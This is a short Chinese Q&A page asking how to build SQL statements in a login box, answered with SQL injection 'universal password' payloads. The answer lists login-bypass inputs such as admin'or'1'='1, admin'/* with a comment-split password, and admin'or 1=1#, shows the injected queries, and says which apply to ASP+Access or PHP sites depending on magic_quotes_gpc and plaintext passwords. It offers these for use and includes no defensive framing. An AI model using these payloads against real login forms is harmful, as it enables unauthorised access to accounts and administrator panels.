如何在登陆框中构造SQL语句

2024-11-29 17:23:45
推荐回答(1个)
回答1:

asp的注入的话估计你一天什么事都不用干了。MySQL + PHP的话本板块置顶安全评估师手册中有后台登陆框POST注入的案例看你的万能密码就知道是asp+access的万能密码就是注入,假设用户名:admin'or'1'='1密码:'or'1'='1带进数据库:select * from admin where username='admin' or '1'='1' and password='' or '1'='1'逻辑自己理php的就多样了select * from admin where username='admin\' or 1=1# and password='xxxoo'//用户名admin'or 1=1#适用于GPC为on或密码为md5select * from admin where username='admin'/*' and password='xxoo*/'or'1'='1//用户名admin'/*密码为xxoo*/'or'1'='1适用于GPC为off,密码为明文select * from admin where username='admin'or'1'='1' and password='or'1'='1'//用户名admin'or'1'='1密码'or'1'='1,适用于GPC为off,密码为明文